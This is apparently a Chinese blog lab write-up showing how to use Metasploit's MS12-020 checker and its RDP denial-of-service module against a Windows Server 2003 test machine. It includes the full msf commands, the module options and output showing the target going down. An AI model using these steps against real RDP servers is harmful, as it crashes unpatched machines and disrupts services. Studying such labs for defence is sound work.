使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程

前言

攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP,默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。

0x01 实验环境

攻击机:kali linux
ip:192.168.8.130
目标机:windows server 2003 Enterprise x64 SP2
ip:192.168.8.129

0x02 漏洞验证

使用msf的模块:auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

       Name: MS12-020 Microsoft Remote Desktop Checker
     Module: auxiliary/scanner/rdp/ms12_020_check
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis "R3dy" 
  Brandon McCann "zeknox" 

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
  This module checks a range of hosts for the MS12-020 vulnerability. 
  This does not cause a DoS on the target.

References:
  https://cvedetails.com/cve/CVE-2012-0002/
  https://technet.microsoft.com/en-us/library/security/MS12-020
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020
  https://www.exploit-db.com/exploits/18606
  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

运行后显示目标系统具有此漏洞:

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x03 漏洞利用

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.8.129    yes       The target address
   RPORT  3389             yes       The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

运行模块后,目标系统windows server 2003 蓝屏宕机:
使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程_第1张图片

你可能感兴趣的:(windows,kali-linux,metasploit)